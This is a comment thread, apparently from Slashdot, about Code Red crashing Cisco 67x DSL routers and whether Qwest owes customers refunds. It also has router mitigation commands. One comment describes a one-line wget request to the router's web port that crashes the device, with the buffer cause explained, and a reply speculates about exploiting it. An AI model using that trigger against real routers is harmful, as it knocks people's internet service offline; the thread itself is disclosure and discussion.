8. While constantly resetting Cisco, I have started IRC, and asked some of my friends if they know, where to find those damn patches. After few minutes I have received some rather unflattering description of CBOS, Cisco and Intel (who happened to be the real authors of this shit), and the URL on Qwest site with CBOS images.

9. CBOS images were distributed as Windows executables, with Windows upload program but no instructions -- probably following the logic that if a customer has his servers infected by a virus, running downloaded executables is the least of his concerns. Fortunately, Windows executable was a wrapped zip file, and upload procedure over a serial console was in the router's documentation.

10. Router worked fine ever since, but it looks like it's still impossible to filter or completely disable web administration on it.

---

Of course, this was that simple only because I had a full access ("exec" and "enable" passwords) to the router. I am afraid to think, how Qwest technicians would have to work if they had to upgrade customers' routers over the network while routers were being attacked, or to distribute passwords to the customers to make them able to run the updater program (I have never seen it running, I assume that it uploads updates either by xmodem over console or by TFTP -- in the first case only customer can enter the password, and in the second one _someone_ has to login to the router and still enter the password), so I kinda understand why Qwest couldn't do much in this situation. OTOH, Cisco could at least issue binary patches as a public-accessible download.

Re:Code Red and Cisco 675

[gblues]

I had a similar thing happen (I disabled web admin, but it was still establishing a connection for a brief amount of time on port 80). My solution? Restrict web admin to the IP of the internal firewall, and (for good measure) change the web admin port to 81.

# set web remote 192.168.1.2 (or whatever IP you want)
# set web port 81
# write
# reboot

No more lockups for me!

Nathan

Re:Code Red and Cisco 675

[Alex+Belits]

You are still vulnerable at the port 81 -- despite the restriction.

Re:Code Red and Cisco 675

[gblues]

Not from Code Red ;)

Nathan

Re:Code Red and Cisco 675

Mr. Lutton's page has more comprehensive and consolidated information on the 67x's than QWest & Cisco combined.

I agree...

[Justen]

I guess I am a little bit obsessive-compulsive about paying for services, but I do pretty heavily police what I pay for.

The majority of businesses that value their customers do not mind doing a pro-rata credit for service or product outages. Verizon, Hearst Magazines, Ntelos, Sprint... They are all companies that I have had positive experiences with.

It is unfortunate that Qwest doesn't appear to be a bit more understanding. If I am to understand the article and the situation correctly, it was preventable... Had they been using a more secure platform. Additionally, the poor support is unexcusable.

Qworst? =)

It really is a better business practice to issue credits to those with legitimate claims, while not admitting liability. And if someone feels they need to take it further, they will.

I guess I have to be nicer to Verizon. They could be as mean as Qwest.

jrbd

Code Red is not a natural disaster

and should not be compared to such

Not necessarily bullshit.

[M@T]

If you're a home user with a single dialup at a local ISP, that's one thing.. (and I still think you have a right to stable service here as well)

...but if you're a large organisation maintaining a global development infrastructure, and you're paying a telco a couple of $$$K a month, then you should be certainly be entitled to a refund when that service dies and disrupts your business...

...further, if it can be shown that the service died due to incompetence, eg. the service died in the later rounds of Code Red attacks AFTER all of the press and subesquent release of patches etc., then you should be able to sue them for damages.

Large or small, its a service you pay a fee for. If its not your fault, then no service, no fee.

Re:Did I miss something?

Note, those cisco products are PC-based things, that run Windows. They provide a UI through a webserver, which is IIS.

I'd hardly call that "embedded", unless you call a Win2k box being owned an "embedded rootkit" :-)

The IOS routers run their own webserver also, which is pretty bad code (it's disabled by default on routers, but needs to be disabled with "no ip http server"). The IOS webservers serve no additional purpose, they merely provide a web UI to the IOS CLI, so it's really unnecessary (thankfully!).

Ameritech for once...

[ChowyChow]

Ameritech's DSL service for once pulled through this one. The only difference I saw was that my modem resync'd quite a few times, till now that things have died down a bit (seeing 200 accesses to port 80 instead of over 500.)

Those with their service know of the usually unhelpful tech support.

As much as I hate to side with USWest / QWest...

[LrdZombie]

As much as I hate to side with USWest / QWest / Whatever the hell they choose to call themselves these days, I don't think anyone is entitled to a refund. I was somewhat irritated about the whole mess, but it wasn't QWest's fault and I believe they did they best they could to deal with it. Amazingly enough I not only got a letter but a phone call as well with information about the problem and what to do about it. It was a bit difficult to convince the person who called that I did know what I was doing and was at no risk, but that's besides the point. My service was out for maybe half a day at the most, and I had enough mp3, divx, and pornography to "weather the storm." :) Perhaps a good analogy could be comparing them to a gas station. They agree to sell you fuel, but they are not responsible if hooligans come in the night and fill your gas tank with sugar. You'd at the very least lose the gas you bought and possibly could suffer damages to your vehicle.
If you didn't know enough to set up your computer properly when you connected it to the internet, I have no sympathy for you. Were it up to me, everyone would be required to begin their computer using with a Commodore 64 and then move up to more sophisticated machines. (And yes, there ARE web browsers for Commies. Not bad ones at that.) There seems to be a mentality out there that just because you throw money at something it'll work right all of the time. Either learn how to use it properly or don't bitch when some juggalo comes in the night and exploits your misconfiguration. You aren't entitled to a refund.

Besides, they'd prolly just spend it on crack. :)

Refunds?

[Cytlid]

Well, the local ISP I work for also had customers calling up complaining about slow speeds, many of them on DSL. Alot of our DSL equipment wasn't effected, but overall internet traffic was hell for at least a few days. We informed customers we were doing some rerouting, to avoid it the best we could, and we definitely did not do anything lame like block off port 80. The customers we did find (if any) agreed to patch their IIS webservers, and even those who didn't know what was going on, I explained to them how Code Red works. I think alot of our customers were patient and appreciated anything we could do for them. None of them even mentioned the idea of refunds, but I'm sure that might come up at least once or twice.

As a consumer, I can say... if you're not happy with the quality of a service, definitely don't pay for it. I mean, quit it all together. Ok, let's say my cable modem went down for 3 days... for any reason. Can I deal with that? Sure, I would be aweful damn happy when it was over with. But what's worse? Being down for 3 days, or getting so pissed off and disconnecting the service alltogether? If you were down for 3 months, an unreasonable amount of time, I would say sure, a rebate would be in line. But I think after a month or so, you would have cancelled the service and gone with someone else. It's the nature of business and places like Qwest know this, so they do what they can to get people back up and running as soon as possible. And besides, nothing's perfect and we're all human.

I did what I could for our customers. I informed them about Code Red. And hopefully when they left work that day and went to the bar, they told all their friends about the Code Red story and how to patch your server, etc. And hopefully alot of people listened and cooperated to get this thing under control.

Very bad

[Frodo]

My net connection when down too, and I don't run around demanding $5 back.

Very bad that you do not. If you did, and everybode around did the same, probably the current sore state of the security would improve, some knowledgeable sysadmins would be hired and some holes would be plugged.

As long as the users agree to get crappy service, crappy software and crappy security for their money, they will get crap. The only way to not get crap is to refuse to tolerate that anymore. So if somebody sues their ISP that neglected to provide them the required service and to maintain secuirty, it's a very good thing. If people are promised 24x7 connection and support and then when the problem comes they are said "well, it doesn't work, just wait and maybe it will be fixed in a day or two or more" - they have the right to demand compensation.

right on (only one with a clue)

[slimme]

The only people you can sue succesfully are the people running unpatched IIS. Everyone has to agree that they a guilty of gross negligence, pure an simple.

They cause(d) the damage, they should pay.

Only ones left

There are only a few DSL companies left before Verizon takes over the world. I think we should stand with them on this and not let an even worse company that cares about nothing take over

Re:Want to Sue? Sue Microsoft!

[mr]

Damages could also include additional bandwidth consumed hat you paid for, and time to manage the damage.

Think too of including e-mailed and other viruses....All the things that make Microsoft a poor neighbor.

Benefit to the consumer? When the cost of writting good code is less than the shlock they now produce, the code will get better.

Re:Want to Sue? Sue Microsoft!

[slimme]

Who causes damage to you?

Did Microsoft cause damage to you?

They warned the users of IIS to patch their software didn't they? So I guess the only people responsible for this mess are the ones running unpatched servers. They should be sued.

There is no agreement between you and the owner of the unpatched server, so they can be sued. And they will learn that:
-buying from Microsoft is not a safe option ("nobody gets fired for buying Microsoft")
-having a knowledgeable system administrator around is very usefull

B.T.W. if someonen attacks you from an unpatched server, it doesn't matter what license agreements you have signed. You have not signed the license agreement of the unpatched server, so you are not bound by it.

Road Runner should give refunds!

[fmaxwell]

According to my Road Runner's web page:

"The Road Runner system has been designed to offer access to all the high speed services mentioned above, even assuming continuous, maximal usage by every Road Runner user in a neighborhood simultaneously.

Since Road Runner is supposedly designed to be impossible to saturate, then they should refund money to those who had unusable connections -- especially since the vast majority of the Code Red traffic came from within their network. Of course, this is just another example of marketing hyperbole as many Road Runner franchises (including mine) are horrendously overloaded and subject to packet loss and high latency at peak usage times.

The real point is that many networks were not taken down or even substantially slowed by Code Red. That makes it pretty clear that Code Red was not some all-powerful force capable of bringing the Internet to its knees. The networks that were rendered useless by it were the ones that had inadequate capapacity.

Re:why not? NOT! it's "Who!"

[BradleyUffner]

code red has nothing to do with email clients, and it has nothing to do with running attachments.

Re:Want to Sue? Sue Microsoft!

[mr]

So you are saying that the maker of an unsafe product has *NO* liability?

How about a product that is dangerous?

M$ cost

Those businesses that use M$ technology should
realize that there is a huge hidden cost to using
their technology. Not only in the extra manpower
required to manage and support it (see reports from
IDG, Gartner, etc..) but also in the constant bug
tracking and loss of business that comes from buggy
software. What other OS does one have to format
the disk and reinstall atleast once every 6 months ?

The Customer is always right

[Hector73]

As much as I hate to say it, Qwest should give refunds for the customers who ask for it. Any business should know that "The Customer is always right".

McDonald's provides a good example of this. The great Monopoly game scandel was not their fault, but immediately after news of the scandel broke,
they offered a new $10 million dollar contest. Instead of claiming, "its not their fault", they said they were sorry, toke a minor slap on the wrist, and ended the bad press immediately.

Qwest should do the same. They should just quietly give refunds to the customers who ask for them. Millions of retails companies across the country give refunds every day. Its part of the cost of running a successful business. Tech companies that don't realize this will go out of business (unless they are a monoply, of course).

Re:The Customer is always right

[shwim]

Qwest is under no legal obligation to refund anything to it's customers, in this situation because the outages were caused by malicious acts out of their control. Since they don't filter packets, they aren't responsible for the content that goes over their networks. It would be like suing your customers because they didn't go shopping at your store due to severe weather.

"The Customer is always right." should be the underlying motto of any business' mission statement. However, even though the customer is right, they don't always know the best way to resolve the issue.

As a gesture of good business, I think Qwest should offer some sort of credit for future payments. If those customers that really want to get any lost revenue due to apparent outakes (not actual outages), then they should go after the incompetent system admins that didn't patch up the IISs.

Re:The Customer is always right

[Hector73]

I agree that Qwest is under no legal obligation to do anything.

But, any corporation doing business in America in this day and age should realize that 99% of the time it is better to suck it up and take a minor monetary short term loss than *risk* offending potential long-term customers. Once a company gets a reputation for poor service, its real hard to change it.

Nice logic

[Smack]

"My connection didn't go down, therefore no one else's did."

Time-Warner/AOL refunded without prompting.

[Cerebus]

My last bill for RoadRunner service was approximately half it's normal amount. The reduction was the result of a credit for intermittant loss of service for about two weeks. My city seemed to be particularly hard-hit by local CR/CRII infections (I was seeing about 20 arps/second at one point, just from my local segment-- not counting forwarded stuff).

Never asked. Now, I'm the last person to be a fan of mega-mega-octupii like TW/AOL, but I was impressed. Having worked for ISPs in the past I know that outage refunds are not unusual, but in my experience you ALWAYS have to ask.

Here's an idea...

[telstar]

Why not just sue MP3.com ... It seems to work for most other complaints.

Qwests level of responsibility.

[topham]

Qwest shouldn't be held responsible for the worm, or it's direct actions.

On the other hand, I believe they (along with others) had problems relating to bugs in the DSL modems. Bugs which they had a patch for but didn't inform their customers about immediatly. For that they are potentially responsible for.

My Qwest experience...

[dR.fuZZo]

...was a bit different than yours.

I received the call (and the letter, for that matter) from Qwest about the Cisco/Code Red issues. I had already heard about it, but, I had a bit of a related DSL problem I had to ask them about. Oh no, the caller informed me, he couldn't help me with that. He gave me a phone number to call.

Ok, says I, I'll just call them up right now and get this taken care of. I call, go through the system ... and am given another phone number to call.

Well....this isn't so convenient, says I, but I'll give 'er a shot. I called up this second phone number and I'm told that all lines are busy now. They'll take my call as soon as they can. My estimated wait is... 60 minutes.

Ok, I wasn't that desperate. So, I went to their website to request help through their online customer service form. They usually get back to people quite promptly, I'm informed.

Five days later ... I get an email response saying that I'm going to have to call them to take care of this issue. Yeah...uhm...I guess I'll wait until I have a good hour or more free to sit on the phone... Right now, like you, I use Qwest for DSL and ISP service. When the change goes through to force people to MSN, I think I'm going to cancel my service.

Re:My Qwest experience...

[crleaf]

I didn't recieve the call, but I was having problems so I called in. I got 'your estimate wait time is 83 minutes'. I waited 80+ minutes and click it sounded like it was transfered, followed by silence, followed by disconnection. Then I called back to hear that the new estimated wait time was 87 minutes. At this point I had 0 online connectivity, so I really had nothing else to do. :) When I finally did get through to someone, found out what I needed to do... I did that and everything was golden. I don't mind waiting on hold if I get fixed after waiting. I also appreciate the poor folks who had to work weekends and such with calls coming in nonstop.

Roadrunner even worse

Roadrunner in Fairfax, VA just shut off all incoming port 80 access. No warning, no apologies, and so far no refund. Is there a good broadband provider anywhere?

I want my money back.

[AugstWest]

I use Charter Pipeline cable service, through Earthlink, and I lost access for 2 full weeks. They're overcharging for the service as it is, and during the outage they stopped answering their phones and never let *any* of their customers know what was going on, what was being done, and when it was going to be fixed.

If I'm paying through the nose for a high speed connection, and it disappears for 2 solid weeks, you can bet that I want some money back. They're giving us all a free month of service now.

Good question.

[dave-fu]

Now who do I sue for the never-ending wu-ftpd/telnetd/sendmail exploits? I never accepted an EULA, so I feel some cash should be lining my pockets right quickly.

Cisco DSL routers run IIS!

[Akuinnen]

Alot of people seem to be confused. The Cisco DSL routers embed or run IIS. That's how Qwest users are getting infected. As far as who's to blame, well that would be MS, since they wrote IIS. Cisco should have known better than to use IIS.

Re:Cisco DSL routers run IIS!

[trailerparkcassanova]

No, router config tools run on NT which is running IIS.

Re:Cisco DSL routers run IIS!

[yobtah]

I truly hope you're both joking.

Re:Cisco DSL routers run IIS!

[Akuinnen]

No... sorry.. let me quoteth Cisco:

"The worm infects and replicates through a vulnerability in the
Microsoft Internet Information Server (IIS). This creates an
infection exposure for Cisco products that embed or run on IIS."

Re:Cisco DSL routers run IIS!

[trailerparkcassanova]

No...sorry..No Cisco router runs IIS, embedded or otherwise.

Re:Cisco DSL routers run IIS!

[Akuinnen]

Ahhh.. shoot.. I read the TAC e-mail wrong. Thanks!

"Cisco 600 series DSL routers are vulnerable to a repeatable denial of service until the software is upgraded, or workarounds are applied."

I've got better things to do...

...Than whine about a problem that NO ONE could possibly have forseen. Besides, it was my fault for not initially spotting, and disabling, the web configuration interface for my own 675.

Sure, Code Red's second incarnation may have knocked my site off the air for a week as a result, but Lord help me if I ever get to the point where I can't stand being "unwired" for at LEAST that long!

(Your word for the day is 'Qwoob.' Please use it responsibly).

I run my 'net presence, and my side business, for the same reason I ran a FidoNet BBS for nearly a decade: Because it's fun. If it should cease to be fun, I cease doing it.

I think the A-G's office should have better things to do as well. Like going after spammers under the WA state anti-spam law. Said law was, after all, ruled by the courts to be very much constitutional.

Open comment to my fellow WA state DSL customers: Grow up! Find something better to do with your time than run around and gripe. There's more than enough frivolous legislation and law-suiting going on without us adding to it.

Oh, BTW: Your word for the day is 'Qwoob.' Please enjoy it responsibly.

Reee-Fund?

[hndrcks]

Did anybody else think of Paul Dooley (the dad) in the movie 'Breaking Away' when the son gives the guy the refund on the used car?

"Reee-Fund? Reee-Fund?"

Maybe he works for QWEST now...

Qwest was seriously down

Qwest needs to kick back cash.

We are in Seattle and were down. We waited on hold for 1 hour and 45 minutes trying to speak with someone at Qwest. We were finally disconnected and never able to speak with someone.

At the time it wasn't clear whether this was a code red thing or another problem with our service.

I would argue that, given the warning they had, they could have better defended against the attack.

But companies these days seem less willing to do what is necessary to retain those "prima donna's" so necessary for these situations. Pay the PD's now, or kick back cash later..

Suprisingly, ATT@HOME offered me a month of free service ($40) due to Code Red problems and my concerns about their changes to the FAQ stating server filtering would be going in. Normally their support is the worst, but the rep was *really* sweet and she offered. We'll see if I get the credit (a common sprint-PCS tactic - offer it, but you never get it).

The only problem with this is...

[WyldOne]

I want to be able to move that filtering up to the ISP's side. That way my bandwidth is not affected. (at least not down my DSL line) I have a 640/256 line, and I still see the packets down to my cisco.

This both sucks and blows as it messes up my Q3, and UT scores. ;)

Re:Umm..

[WyldOne]

What about all the users who have been infected from inside a gateway? eg. all the internal traffic. Won't help them at all. They would have to block it at the Megapop itself. (I am not a megapop expert) Besides, I just got connected on a new ISP and had 120 hits in one day. My Apache just laughed at them!

Time Warner Triad NC Area anecdotal, OT, blah blah

[jazmataz23]

I have good and bad to say about them. First of all, my service was absolutly terrible during the peak two weeks. After the "fixed" "random search" version of code red came around, my connection went down and didn't come back reliably until I got on the phone with them two weeks (and two diablo2 HC characters -- I'm not a fast learner) later. Once I had them on the phone, I had to convince them that YES I had reset the 'modem', YES (both of) my network cards worked, and that YES I had patched my system so I was not the cause of the problem. Once I got past that, the tech put me on hold for twenty minutes while she discussed the situation with someone remotely clueful. Finally, she came back on and said "we have been getting a lot of complaints from your area, we'll send a tech out to take a look. And we'll credit your account for the time you've been down." I had never asked for that, but think it was entirely appropriate. By that evening, everything was fine (and has been, despite the ?still? continual default.ida? requests).
I have been pretty much end-to-end impressed with TWC's service, despite the fact that cable in my area is VERY popular. The incumbent local carrier (*cough*BellSouth) absolutely bites; no concept of quality customer service in the face of crisis. The TWC rep pretty much walked me through the basics, and then got someone to help her that had a grasp of the big picture. They got the problem fixed, *and* made me happy to boot.
'nuff rambling,
jaz

Let me spell it out in small words then...

[Archfeld]

If it was an act of god, and they had no control then QWEST is not at fault. If on the other hand there was time and precautions were available for MOST PEOPLE, then QWEST is negligent and deserves to pay for that. I am not a qwest customer nor do I know all the details. PACBELL sent email out to anyone who showed PORT 80 activity nearly a week prior to the problem. There WAS NO SERVICE interuption for me, and it is WELL WITHIN my rights as a customer to run a web-server or anyother server. As to why the 'FUCK' they should care, can't help ya there bud.

Being a Qwest DSL customer...

After about two months of having to unplug my cisco 678 (Also happend to 765s) and plug it back in to get my DSL service working again, I could relate to this problem. When I pay 60 dollars a month to have my DSL service, I expect prompt closure of any situation that may occur, but obviously this wasn't the case.

I didn't think much about it when it first happened, my modem just stopped responding, as if a lockup had occured. It wasn't much of a problem, until the frequency of the problem increased exponentially (Instead of having to unplug my modem once every 2-3 days, it was not once every 2 hours). Qwest had no solution to this problem, infact I heard that they just stopped taking phone calls about it (General Qwest tech support hold times are in the 1 hour plus range, and this is just for the common lacky who will go through a set of written instructions to get you modem to work, higher level tech support requires a call back (If you are lucky)), I still have an email on my system from qwest, suggesting that the user unplug/plug the modem back in when these lockup type problems occur.

The problem stems from the Cisco 67x and the fact that when the Web configuration is disabled, the modem still responds to traffic at port 80. Kind of stupid. But when I was discussing the situation with a friend, she was told by tech support to reflash the Cisco 67x, and that would fix the problem, unfortunately it didn't, and a changing of the Web port was involved, from 80 to something else.

I must reiterate the fact that I pay 60 dollars a month for this service, and should not have these situations pop up as they do. 60 dollars is for the low end basic DSL (On all the time, no static ip...etc). There are companys that pay more than 5 times as much as I do, who need this service, I think customers should be compensated for their troubles.

The question is WHO to sue

[WyldOne]

Until the loser who wrote the virii is caught and tortured^H^H^H^H^H^H^H^Hprocecuted, this will not end. eg. end-user sues ISP, ISP sues (MS/CISCO) who in turn sues the l-uzer^H^H^H^H^H^HPlaintiff. Like anyone is going to get any money out of it.

Re:As much as I hate to side with USWest / QWest..

[trailerparkcassanova]

C64? Hell, that's an advanced computer with a HL language and everything. It has a keyboard and even displays stuff on a TV!! I think they should start out with a 4004, some perfboard, a wirewrap gun and a databook.

sue microsoft

[Magius_AR]

for reasons posted in other thread

Who is responsible for Code Red problem??

I work for an DSL provider and I lived the problem with Code Red/IIS/67x CPE. There are a lot of wrong arguments about this problem, specially on the Cisco side because there is no official announce about this.

Upgrade the 67x to CBOS 2.4.2 solve the problem.
This is not true. This version of CBOS solve the issues when you have the admin web enable, and other issues explained by Cisco, but the CPE keep crashing with web disable option.

Try this at home.... with the newest version of CBOS and web disable do a 'wget http://[IP CPE]:[port]'. After a few seconds you CPE will crash.

Note that does not matter if your have the web disable... your CPE will crash anyways. We have make the same test hundred of times.

The only solution is to change the web port to another port so Code Red don't hit it. Anyways if some one discover the port it can crash the CPE using wget.

What Cisco is saying about this???? NOTHING!!!

Microsoft products have a lot of bugs, but each time one is confirmed they accept it and release a patch, instead Cisco keep silence.

I think we all have to blame Cisco for this problem. They are so arrogant that does not accept that their products have stupid bugs.

If yo do a telnet to any port on CBOS it just do not respond at all, but doing a telnet to the web port you could see (with web disable), the CBOS accept the TCP connection and then close it, and that is the problem. With an average of 15 a sucessive connection attempt, the TCP buffers fills up and crash the CBOS.

So with this logic

[interstellar_donkey]

With this kind of logic, does this mean I can ask for a tax refund from the department of transportation because people keep ramming my car?

No, but. . .

[Salgak1]

. . .when @Home dropped my connection, first claiming it was a regional outage, then a local one, and finally, on Friday afternoon of a 3-day weekend, admitted that it was maintenance on the local TV-Cable plant that knocked everyone on my loop offline, and they'd have to re-provision everyone on our loop, the first available tech can get to you in 4 weeks. . .oh, and your payment for next month was due today, when can we expect to recieve it ????

And they wonder why @Home is in trouble. I don't get those problems with my DSL line (which came available to me about a week or so before my @Home service dropped off the face of the earth. . .). . .

Qwest does owe customers a rebate.

[n0ano]

I tend to think this is just complaining bull crap. My net connection when down too, and I don't run around demanding $5 back.

Being a Quest customer using one of their Cisco 675 routers I was on the recieving end of this affair and I think Qwest owes its customers a refund because of the pathetic way they dealt with this situation. I spent 3 weeks power cycling my router 3 to 4 times a day, not being able to connect to work from home because the router got hit every evening. What really bites about this is I followed Qwest's instructions and they were not sufficient.

Originally, I followed Qwest's instructions to disable web access to the router. I still got hit and had to power cycle multiple times a day. Then I read an article on The Register about the situation and followed the link to a writeup at the Cisco site that described how to work around the problem (turns out you also had to change the access port to >1024). Why didn't Qwest do their homework and discover the real solution originally?

Also, being a Linux user, I have no choice but to use Quest's preferred Cisco router. The only other DSL hardware available for Qwest's DSL system are an internal PCI card and an external USB modem. Both of these devices use proprietary drivers that only work with Windows and I can't even get specs on them to create my own driver.

Since Quest has forced me to use hardware that they selected that was vulnerable to this outage then I believe they should shoulder the responsibility for that selection.

Re:Want to Sue? Sue Microsoft!

[slimme]

That's none of your concern. The other people might be running some software pretending to be infected IIS for all you know.

You should sue people causing damage to you. Then they can find out if they can sue Microsoft for supplying a non bulletproof webserver (which they can't succesfully).

How was it down?

[Sloppy]

The article doesn't say how the service didn't work.

Did Qwest actually shut down stuff, or was it just so clogged with traffic that it was effectively unusable? If the former, it's QWest's problem and people deserve a refund. If the latter, it's just Life.

Re:How was it down?

[Rick+the+Red]

Read this. It contains links to other articles that will answer your question.

Basically, Code Red somehow affected USQwest's Cisco DSL modems, which all stopped working and had to be reset. That's how they lost service: the USQwest equipment located in the customer's premisis failed, and USQwest left it up to the customer to fix it. The sooner you figured out what was wrong, learned how to fix it, and successfully performed the repair, the sooner you were back on-line. Since the delay in fixing USQwest's equipment was entirely due to the cusomer's inaction, ignorance, and/or technical inexperience, USQwest feel they don't need to offer any refunds.

And since the Explorer wouldn't have rolled over and killed Uncle Fred if he wasn't driving it, it's Uncle Fred's fault, not Firestone or Ford's. Ain't Republ^h^h^h^h^h^hCorporate Logic wonderful?

eat me

eat me geeks!

Send me you're money

If a service you pay for is down for an hour or even a couple hours, most people wouldn't think of asking for a refund. What if it's down for a week ? three weeks ? At some point, you begin to realize that you're paying for service that's not being delivered. If your lawn service didn't show up for a couple weeks, would you still be willing to pay them for those weeks ?

Qwest, like most broadband ISPs, have a regional monopoly. They're not really concerned with customer satisfaction. If Qwest had competetors nipping at their heels, you'd better believe they'd be concerned with keeping customers happy. Competition is the cure.

Btw, I'm a Mediacom / @home customer. It's not the least bit uncommon for my ISP service to be down for days at a time. If I get 20 days of service a month, it's been a good month

Re:Did I miss something?

[Kenyaman]

Did I miss something? My cable was down for 12 hours during a storm, would they prorate my bill and take off 1/60th or 1/62nd of the bill? I dont think so.

Before I bought the satellite dish, a drunk took out a utility pole on my street. We called the cable company, which assured us that the police had notified them, and gave us a "return to service" time of, like 8 am the following morning. By mid afternoon I called them to find out what was up: they'd lost the ticket and sent someone out immediately. They credited me 1 month's charge for the missed service call.

In this instance, though, it sounds like the issue the plaintiff's see is that Qwest's own network was infected, rather than "I lost connection because the network was flooded by my neighbors' infected machines."

Not the whole story

[Rick+the+Red]

The article referenced does not tell the whole story. Here are some stories that appeared recently in the Seattle Times and the Seattle P-I:

Times:
Qwest refuses refunds to DSL customers for Code Red outages
Qwest falls short tackling Code Red worm, but other DSL customers appear to fare better
'Code Red' wrigglings put users in knots

PI:
State pressing Qwest for refunds after 'Code Red II' DSL breakdowns
Worm has Qwest DSL customers seeing red

The real story is not in the articles about the State pressing USQwest for refunds, but the earlier ones describing how USQwest basically ignored the problem for as long as possible, then gave people like your Aunt Mildred complex instructions on how to patch their computers and DSL modems, which were broken by Code Red even though the affected customers were not running NT and ISS! Naturally, the Aunt Mildred's of the world had, shall we say, difficulty following the instructions, and if you didn't follow them exactly you only made it worse. It was USQwest's Cisco DSL modems that got hosed, not their customer's PCs, and the customers were first demanding that USQwest fix it and now are rightly demanding a refund for the DSL service they paid for and did not receive.

As the excite.com article said, this is the same as not getting your newspaper or cable TV -- if a customer pays for a service they did not get, they deserve a refund. Unfortunately the outcome in this case will be less than optimal, because it won't result in USQwest leaving Washington State for good!

Re:why not? NOT! it's "Who!"

[Coolfish]

Irregardless!

Americans sue who they want, when they want, over the stupidest things, and it doesn't have to make sense! that's the beauty of the system!

Hmmm, I Smell Piss...

here.

Re:Hmmm, I Smell Piss...

here as well.

Re:Want to Sue? Sue Microsoft!

[mr]

Exactly. The lousy Microsoft software *IS* damanging me by consuming my bandwidth, my resources.

If their software was not such a hazzard, there would not be things like Sir Cam or code red or..... The *REST* of the world has standards of quality and responsiblity for their products. Why not software and Microsoft?

Providers like above.net , quest et la have it far worse. They pay $400 per meg of bandwidth.

Qwest and DSL

I've spent quite some time dealing with Qwest DSL support and I have a few comments.

First it was because Qwest was providing you with internet access that some peoples service was going down. The problem was out on the internet, it caused older cisco dsl routers to crash. If they were not connecting you to the internet you would not have had a problem, with Code Red anyway. So are you going to sue them for providing the service you contracted them to provide?

Secondly with DSL from the big telcos (not sure if its the same with smaller outfits) what you are contracting for is a two part service. You get a DSL line which connects you to your ISP and in addition to that is the actual ISP service with the telco or some other provider. Qwest the telco just connects you to your ISP. Reasonably its not up to them to do any kind of blocking or filtering. All the telco is concerned with is getting traffic from your ISP to you. It leaves the ISP, goes through the ATM, through the co, down your phone line, and to your modem/router. That being said most ISPs don't block or filter traffic, some do, but like anything else you pay more for those (or your contract inhibits you from offering services that use the blocked ports).

Thirdly the DSL modem/routers provided by Qwest are sold to you, not leased. They are your property. Its not up to Qwest to configure them or update them to the latest versions of CBOS. They provide assistance in doing both and as a Cisco reseller will repair or replace them for whatever the warentee period is but thats it. Qwest has provided the latest versions of CBOS for download for at least a year. Version 2.4 which shrugs off most of Code Red has been available since the first or second quarter of this year on their site.

Lastly I'd like to discuss businesses that can't function without internet access and are using DSL. I'll take the example provided in the Excite article. That guy lost $5000 in business due to Code Red related outages. If you ask me he deserved it. His business is solely dependant on Qwest DSL internet access. Now how long he was down isn't mentioned so for the sake of argument lets say it was a week. In a month he will do about $20000 in internet related business. And he's banking this on a service that costs $100/month or less? Wouldn't it be prudent to invest another 1/200 of that revenue into a second DSL line from a different provider? If you bank your entire business on something with one single point of failure without a backup you have nobody but yourself to blame when something happens. And it will.

Anyway, just thought I'd throw that out there. I have no love for Qwest, I was without phone service of any sort for a month due to USWest ineptitude. But at the same time I can't stand useless lawsuits by people who think all their troubles are someone elses fault, preferably someone with deep pockets.

Buffer overflow? Hmmm.

[Brett+Glass]

Did you say "the TCP buffer fills up and crashes the OS?" Hmmm. This might mean that one can exploit the buffer overflow to do fun things with the router. If so, it might get Cisco to release a version of its CBOS that isn't crashable, which would be a real long term solution to the problem.

Important: Cisco just published this advisory....

[Brett+Glass]

Cisco just published the an advisory regarding the modem defect. (Note that (a) this comes long after the fact, and (b) Cisco doesn't provide a link to the updated firmware; it merely mentions its existence. To get the update, customers will have to go through - ugh! - Qwest again.)

I just tried to post the advisory here, but Slashdot's software -- in its infinite wisdom -- rejected it with the message "junk character post" (perhaps it was sensitive to the boxes drawn with text characters). So, go to http://www.cisco.com/warp/public/707/cisco-cbos-we bserver-pub.shtml to see it.